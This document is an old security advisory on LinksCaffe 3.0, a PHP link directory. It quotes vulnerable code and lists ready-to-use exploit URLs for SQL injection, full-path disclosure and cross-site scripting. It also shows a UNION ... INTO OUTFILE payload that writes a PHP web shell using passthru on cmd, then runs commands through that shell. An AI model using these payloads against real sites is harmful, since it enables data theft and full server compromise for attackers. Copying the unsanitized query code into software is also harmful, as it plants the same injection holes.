LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties Produce : LinksCaffe 3.0 Website : http://gonafish.com/ Impact : manupulation of data / system access Discovered by : Simo64 - Moroccan Security Team [+] SQL injection ****************** [1]Vulnerable code in line 223 in links.php code : $rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error()); $offset and $limit vars are not sanitized before to be used to conducte sql injection attacks Exploit : http://localhost/linkscaffe/links.php?cat=1&offset=[SQL] http://localhost/linkscaffe/links.php?cat=1&limit=[SQL] [2] Vulnerable code in line 516 in links.php code : if (!$newdays) { $newdays=$daysnew; } else { $newdays=$newdays; } $rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays AND link_val = 'yes'") or die(mysql_error()); Exploit : http://localhost/linkscaffe/links.php?action=new&newdays=[SQL] [3] Vulnerable code in line 516 in links.php code : if ($action=="deadlink") { ........ $rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error()); while($row = mysql_fetch_array($rime)) { extract($row); echo "<li><font class=text10><a href='$link_url' target='_blank'>$link_name</a><br>$link_desc<br></font></li>"; echo "<input type = 'hidden' name = 'link_id' value='$link_id'><input type = 'hidden' name = 'cat_id' value='$cat_id'><input type = 'hidden' name = 'link_name' value='$link_name'> <input type = 'hidden' name = 'link_url' value='$link_url'><input type = 'hidden' name = 'link_desc' value='$link_desc'><input type = 'hidden' name = 'link_email' value='$link_email'><br><input type = 'submit' value = 'Dead Link'>"; } $link_id var are not sanitized before to be used to conducte sql injection attacks Exploit : http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL] [+] FullPath disclosure : PoC : http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT +123456/* Result : Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 540 Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 549 Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 554 [+] Remote Command Execution ***************************** if magic_quote_gpc == OFF we can create a shell in writable folder using (3)!! Exploit : http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+S ELECT+0,0,0,0,'<?passthru($_GET['cmd']);?>',0,0,0,0,0,0,0,0,0,0%20INT O%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/* after we can exec cmds http://localhost/linkscaffe/pipo.php?cmd=ls;id [+] Cross Site Scripting ************************* $tablewidth var in counter.php is not sanitized before to be used to conducte xss attacks $newdays var in links.php is not sanitized before to be used to conducte xss attacks $tableborder,$menucolor,$textcolor,$bodycolor vars in links.php are not sanitized before to be used to conducte xss attacks PoC : http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+ http://localhost/linkscaffe/links.php?action=new&newdays=[XSS] http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS] http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS] http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS] http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS] Contact : simo64 (at) gmail (dot) com [email concealed] greetz to all friends !